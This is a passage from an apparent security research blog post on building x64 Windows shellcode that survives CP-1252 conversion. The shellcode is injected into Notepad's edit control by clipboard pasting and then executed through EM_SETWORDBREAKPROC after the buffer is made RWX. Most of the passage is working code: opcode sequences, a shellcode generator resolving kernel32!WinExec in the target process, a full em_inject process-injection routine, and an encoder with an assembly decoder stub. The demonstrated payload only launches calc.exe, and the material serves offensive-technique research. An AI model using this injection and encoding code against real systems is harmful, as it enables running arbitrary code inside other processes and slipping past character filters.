PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

"\x6a\x00"         /* push  0              */
"\x59"             /* pop   rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xe2\x00"         /* loop  $+2            */
"\x34\x00"         /* xor   al, 0          */
"\x51"             /* push  rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */

"\x6a\x00"     /* push 0                    */
"\x54"         /* push rsp                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x58"         /* pop  rax                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\xff\x00"     /* inc  dword [rax]          */
"\x6b\x00\xff" /* imul eax, dword [rax], -1 */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x59"         /* pop  rcx                  */

3.5 Load and Store Data

Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some aproaches.

Let’s take for example setting EAX to 0x12345678.

"\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */

This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off.

"\x6a\x00"                 /* push 0                          */
"\x54"                     /* push rsp                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\xff\x00"                 /* inc  dword [rax]                */
"\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */

Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

"\x6a\x00"                 /* push   0                      */
"\x54"                     /* push   rsp                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */

Another way using Rotate Left (ROL).

"\x68\x00\x78\x00\x34" /* push  0x34007800        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Another example using MOV and ROL.

"\x68\x00\x56\x00\x12" /* push  0x12005600        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI.

"\x6a\x00"             /* push  0                 */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x5f"                 /* pop   rdi               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb8\x00\x12\x00\xff" /* mov   eax, 0xff001200   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xbb\x00\x34\x00\xff" /* mov   ebx, 0xff003400   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb9\x00\x56\x00\xff" /* mov   ecx, 0xff005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xba\x00\x78\x00\xff" /* mov   edx, 0xff007800   */
"\x00\x27"             /* add   byte [rdi], ah    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x3f"             /* add   byte [rdi], bh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x2f"             /* add   byte [rdi], ch    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x37"             /* add   byte [rdi], dh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

3.6 Two Byte Instructions

If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.

    ; logic
    or al, 0
    
    xor al, 0
    
    and al, 0
    
    ; arithmetic
    add al, 0
    
    adc al, 0
    
    sbb al, 0
    
    sub al, 0
    
    ; comparison predicates
    cmp al, 0
    
    test al, 0
    
    ; data transfer
    mov al, 0
    mov ah, 0
    
    mov bl, 0
    mov bh, 0
    
    mov cl, 0
    mov ch, 0
    
    mov dl, 0
    mov dh, 0
    
    ; branches
    jmp $+2
    
    jo $+2
    jno $+2
  
    jb $+2
    jae $+2
    
    je $+2
    jne $+2
    
    jbe $+2
    ja $+2
    
    js $+2
    jns $+2
    
    jp $+2
    jnp $+2
    
    jl $+2
    jge $+2
    
    jle $+2
    jg $+2

    jrcxz $+2
    
    loop $+2
    
    loope $+2
    
    loopne $+2

3.7 Prefix Codes

Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

Prefix	Description
0x2E, 0x3E	Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
0xF0	The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
0xF2, 0xF3	REP(0xF2) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero. REPNE (0xF3) repeats execution until RCX is zero or the Zero Flag (ZF) is cleared.
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65	The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
0x66, 0x67	Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support operand-size (0x66) and operand-address (0x67) prefixes using a16, a32, o16 and o32.
0x40 – 0x4F	REX prefixes for 64-Bit mode.

4. Generating Shellcode

Some things to consider when writing your own.

Preserve all non-volatile registers used. RSI, RDI, RBP, RBX
Allocate 32 bytes for homespace. This will be used by any API you invoke.
Before invoking API, ensure the value of SP is aligned by 16 bytes minus 8.

Some API will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If it’s not aligned by 16 bytes at that point, expect trouble! 🙂

Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate the injection via notepads edit control works.

// the max address for virtual memory on 
// windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
#define MAX_ADDR 6

// only useful for CP_ACP codepage
static
int is_cp1252_allowed(int ch) {
  
    // zero is allowed, but we can't use it for the clipboard
    if(ch == 0) return 0;
    
    // bytes converted to double byte characters
    if(ch >= 0x80 && ch <= 0x8C) return 0;
    if(ch >= 0x91 && ch <= 0x9C) return 0;
    
    return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
}

// Allocate 64-bit buffer on the stack.
// Then place the address in RDI for writing.
#define STORE_ADDR_SIZE 10

char STORE_ADDR[] = {
  /* 0000 */ "\x6a\x00"             /* push 0                */
  /* 0002 */ "\x54"                 /* push rsp              */
  /* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
  /* 0006 */ "\x5f"                 /* pop  rdi              */
  /* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
};

// Load an 8-Bit immediate value into AH
#define LOAD_BYTE_SIZE 5

char LOAD_BYTE[] = {
  /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
};

// Subtract 32 from AH
#define SUB_BYTE_SIZE 8

char SUB_BYTE[] = {
  /* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
  /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x4d002000 */
};

// Store AH in buffer and advance RDI by 1
#define STORE_BYTE_SIZE 9

char STORE_BYTE[] = {
  /* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
  /* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
  /* 0005 */ "\xae"                 /* scasb                 */
  /* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
};

// Transfers control of execution to kernel32!WinExec
#define RET_SIZE 2

char RET[] = {
  /* 0000 */ "\xc3" /* ret  */
  /* 0002 */ "\x00"
};

#define CALC3_SIZE 164
#define RET_OFS 0x20 + 2

char CALC3[] = {
  /* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
  /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
  /* 0006 */ "\x55"                     /* push  rbp                   */
  /* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 000A */ "\x6a\x00"                 /* push  0                     */
  /* 000C */ "\x54"                     /* push  rsp                   */
  /* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 0010 */ "\x5d"                     /* pop   rbp                   */
  /* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0014 */ "\x57"                     /* push  rdi                   */
  /* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0018 */ "\x56"                     /* push  rsi                   */
  /* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 001C */ "\x53"                     /* push  rbx                   */
  /* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
  /* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
  /* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
  /* 002F */ "\x00\xe5"                 /* add   ch, ah                */
  /* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0034 */ "\x51"                     /* push  rcx                   */
  /* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0038 */ "\x5b"                     /* pop   rbx                   */
  /* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 003C */ "\x6a\x00"                 /* push  0                     */
  /* 003E */ "\x54"                     /* push  rsp                   */
  /* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0042 */ "\x5f"                     /* pop   rdi                   */
  /* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0046 */ "\x57"                     /* push  rdi                   */
  /* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004A */ "\x59"                     /* pop   rcx                   */
  /* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004E */ "\x6a\x00"                 /* push  0                     */
  /* 0050 */ "\x54"                     /* push  rsp                   */
  /* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0054 */ "\x58"                     /* pop   rax                   */
  /* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
  /* 005E */ "\x58"                     /* pop   rax                   */
  /* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
  /* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006A */ "\xab"                     /* stosd                       */
  /* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006E */ "\x6a\x00"                 /* push  0                     */
  /* 0070 */ "\x54"                     /* push  rsp                   */
  /* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0074 */ "\x58"                     /* pop   rax                   */
  /* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
  /* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 007E */ "\x5a"                     /* pop   rdx                   */
  /* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0082 */ "\x53"                     /* push  rbx                   */
  /* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0086 */ "\x6a\x00"                 /* push  0                     */
  /* 0088 */ "\x6a\x00"                 /* push  0                     */
  /* 008A */ "\x6a\x00"                 /* push  0                     */
  /* 008C */ "\x6a\x00"                 /* push  0                     */
  /* 008E */ "\x6a\x00"                 /* push  0                     */
  /* 0090 */ "\x53"                     /* push  rbx                   */
  /* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0094 */ "\x90"                     /* nop                         */
  /* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0098 */ "\x90"                     /* nop                         */
  /* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 009C */ "\x90"                     /* nop                         */
  /* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 00A0 */ "\x90"                     /* nop                         */
  /* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
};

#define CALC4_SIZE 79
#define RET_OFS2 0x18 + 2

char CALC4[] = {
  /* 0000 */ "\x59"                 /* pop  rcx              */
  /* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0004 */ "\x59"                 /* pop  rcx              */
  /* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0008 */ "\x59"                 /* pop  rcx              */
  /* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 000C */ "\x59"                 /* pop  rcx              */
  /* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0010 */ "\x59"                 /* pop  rcx              */
  /* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0014 */ "\x59"                 /* pop  rcx              */
  /* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
  /* 001D */ "\x00\xe1"             /* add  cl, ah           */
  /* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0022 */ "\x51"                 /* push rcx              */
  /* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0026 */ "\x58"                 /* pop  rax              */
  /* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
  /* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0030 */ "\x59"                 /* pop  rcx              */
  /* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0034 */ "\x5b"                 /* pop  rbx              */
  /* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0038 */ "\x5e"                 /* pop  rsi              */
  /* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 003C */ "\x5f"                 /* pop  rdi              */
  /* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0040 */ "\x59"                 /* pop  rcx              */
  /* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0044 */ "\x6a\x00"             /* push 0                */
  /* 0046 */ "\x58"                 /* pop  rax              */
  /* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004A */ "\x5c"                 /* pop  rsp              */
  /* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004E */ "\x5d"                 /* pop  rbp              */
};


static
u8* cp1252_generate_winexec(int pid, int *cslen) {
    int     i, ofs, outlen;
    u8      *cs, *out;
    HMODULE m;
    w64_t   addr;
    
    // it won't exceed 512 bytes
    out = (u8*)cs = VirtualAlloc(
      NULL, 4096, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
    
    // initialize parameters for WinExec()
    memcpy(out, CALC3, CALC3_SIZE);
    out += CALC3_SIZE;

    // initialize RDI for writing
    memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
    out += STORE_ADDR_SIZE;

    // ***********************************
    // store kernel32!WinExec on stack
    m = GetModuleHandle("kernel32");
    addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
    m = GetProcessModuleHandle(pid, "kernel32.dll");
    addr.q += (ULONG_PTR)m;
    
    for(i=0; i<MAX_ADDR; i++) {      
      // load a byte into AH
      memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
      out[2] = addr.b[i];
    
      // if byte not allowed for CP1252, add 32
      if(!is_cp1252_allowed(out[2])) {
        out[2] += 32;
        // subtract 32 from byte at runtime
        memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
        out += SUB_BYTE_SIZE;
      }
      out += LOAD_BYTE_SIZE;
      // store AH in [RDI], increment RDI
      memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
      out += STORE_BYTE_SIZE;
    }
    
    // calculate length of constructed code
    ofs = (int)(out - (u8*)cs) + 2;
    
    // first offset
    cs[RET_OFS] = (uint8_t)ofs;
    
    memcpy(out, RET, RET_SIZE);
    out += RET_SIZE;
    
    memcpy(out, CALC4, CALC4_SIZE);
    
    // second offset
    ofs = CALC4_SIZE;
    ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
    out += CALC4_SIZE;
    
    outlen = ((int)(out - (u8*)cs) + 1) & -2;

    // convert to ascii
    for(i=0; i<=outlen; i+=2) {
      cs[i/2] = cs[i];
    }

    *cslen = outlen / 2;
    // return pointer to code
    return cs;
}

5. Injecting and Executing Shellcode

The following steps are used.

Execute notepad.exe and obtain a window handle for the edit control.
Get the edit control handle using the EM_GETHANDLE message.
Generate text equivalent to, or greater than the size of the shellcode and copy it to the clipboard.
Assign a NULL pointer to lastbuf
Read the address of input buffer from the EM handle and assign to embuf.
If lastbuf and embuf are equal. Goto step 9.
Clear the memory buffer using WM_SETSEL and WM_CLEAR.
Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
Set embuf to PAGE_EXECUTE_READWRITE.
Generate CP-1252 compatible shellcode and copy to the clipboard.
Set the edit control word break function to embuf using EM_SETWORDBREAKPROC
Trigger execution of shellcode using WM_LBUTTONDBLCLK

BOOL em_inject(void) {
    HWND   npw, ecw;
    w64_t  emh, lastbuf, embuf;
    SIZE_T rd;
    HANDLE hp;
    DWORD  cslen, pid, old;
    BOOL   r;
    PBYTE  cs;
    
    char   buf[1024];
    
    // get window handle for notepad class
    npw = FindWindow("Notepad", NULL);
    
    // get window handle for edit control
    ecw = FindWindowEx(npw, NULL, "Edit", NULL);
    
    // get the EM handle for the edit control
    emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);
    
    // get the process id for the window
    GetWindowThreadProcessId(ecw, &pid);
    
    // open the process for reading and changing memory permissions
    hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);

    // copy some test data to the clipboard
    memset(buf, 0x4d, sizeof(buf));
    CopyToClipboard(CF_TEXT, buf, sizeof(buf));    
    
    // loop until target buffer address is stable
    lastbuf.p = NULL;
    r = FALSE;

    for(;;) {
      // read the address of input buffer     
      ReadProcessMemory(hp, emh.p, 
        &embuf.p, sizeof(ULONG_PTR), &rd);

      // Address hasn't changed? exit loop
      if(embuf.p == lastbuf.p) {
        r = TRUE;
        break;
      }
      // save this address
      lastbuf.p = embuf.p;
    
      // clear the contents of edit control
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      
      // send the WM_PASTE message to the edit control
      // allow notepad some time to read the data from clipboard
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
    }
    
    if(r) {
      // set buffer to RWX
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);
        
      // generate shellcode and copy to clipboard
      cs = cp1252_generate_winexec(pid, &cslen);
      CopyToClipboard(CF_TEXT, cs, cslen);
        
      // clear buffer and inject shellcode
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
      
      // set the word break procedure to address of shellcode and execute
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
      SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
      
      // set buffer to RW
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
    }
    CloseHandle(hp);
    return r;
}

6. Demonstration

Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.

7. Encoding Arbitrary Data

Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

7.1 Encoding

Read a byte from the input file or stream and assign to X.
If X plus 1 is allowed, goto step 6.
Save escape code (0x01) to the output file or stream.
XOR X with 8-Bit key.
Save X to the output file or stream, goto step 7.
Save X plus 1 to the output file or stream.
Repeat steps 1-6 until EOF.

// encode raw data to CP-1252 compatible data
static
void cp1252_encode(FILE *in, FILE *out) {
    uint8_t c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if the result of c + 1 is disallowed
      if(!is_decoder_allowed(c + 1)) {
        // write escape code
        putc(0x01, out);
        // save byte XOR'd with the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

7.2 Decoding

Read a byte from the input file or stream and assign to X.
If X is not an escape code, goto step 6.
Read a byte from the input file or stream and assign to X.
XOR X with 8-Bit key.
Save X to the output file or stream, goto step 7.
Save X – 1 to the output file or stream.
Repeat steps 1-6 until EOF.

// decode data processed with cp1252_encode to their original values
static
void cp1252_decode(FILE *in, FILE *out) {
    uint8_t c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape code
      if(c == 0x01) {
        // read next byte
        c = getc(in);
        // XOR the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte minus one
        putc(c - 1, out);
      }
    }
}

The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.

; cp1252 decoder in 40 bytes of x86/amd64 assembly
; presumes to be executing in RWX memory
; needs stack allocation if executing from RX memory
;
; odzhan

    bits 32
    
    %define CP1252_KEY 0x4D
    
    jmp    init_decode       ; read the program counter
    
    ; esi = source
    ; edi = destination 
    ; ecx = length
decode_bytes:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; skip null byte
    lodsb                    ; read next byte
    xor    al, CP1252_KEY    ; c ^= CP1252_KEY
save_byte:
    stosb                    ; save in buffer
    lodsb                    ; skip null byte
    loop   decode_bytes
    ret
load_data:
    pop    esi               ; esi = start of data
    ; ********************** ; decode the 32-bit length
read_len:
    push   0                 ; len = 0
    push   esp               ; 
    pop    edi               ; edi = &len
    push   4                 ; 32-bits
    pop    ecx
    call   decode_bytes
    pop    ecx               ; ecx = len
    
    ; ********************** ; decode remainder of data
    push   esi               ; 
    pop    edi               ; edi = encoded data
    push   esi               ; save address for RET
    jmp    decode_bytes
init_decode:
    call   load_data
    ; CP1252 encoded data goes here..

The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.

8. Acknowledgements

I’d like to thank Adam for feedback and advice on this post. Specifically about CF_UNICODETEXT.

9. Further Research

List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.

10. Code Scrapheap

What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.

"\xb0\x00"     /* mov  al, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\xb4\x00"     /* mov  ah, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\x98"         /* cwde                   */

Another idea for seting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

"\xf8"                 /* clc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

"\x6a\x00"             /* push  0                     */
"\x58"                 /* pop   rax                   */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\xf9"                 /* stc                         */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\x14\x00"             /* adc   al, 0                 */

Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.

"\x6a\x00"     /* push 0                 */
"\x54"         /* push rsp               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xff\x00"     /* inc  dword [rax]       */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x99"         /* cdq                    */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x92"         /* xchg eax, edx          */

I examined various ways to simulate instructions and conceded it could only work using self-modifying code. Using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address of where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There’s no JMP, Jcc or CALL instructions that can be used directly.

If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

"\x39\xd8"             /* cmp   eax, ebx           */

There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generates the wrong result.

"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5e"                 /* pop   rsi                    */
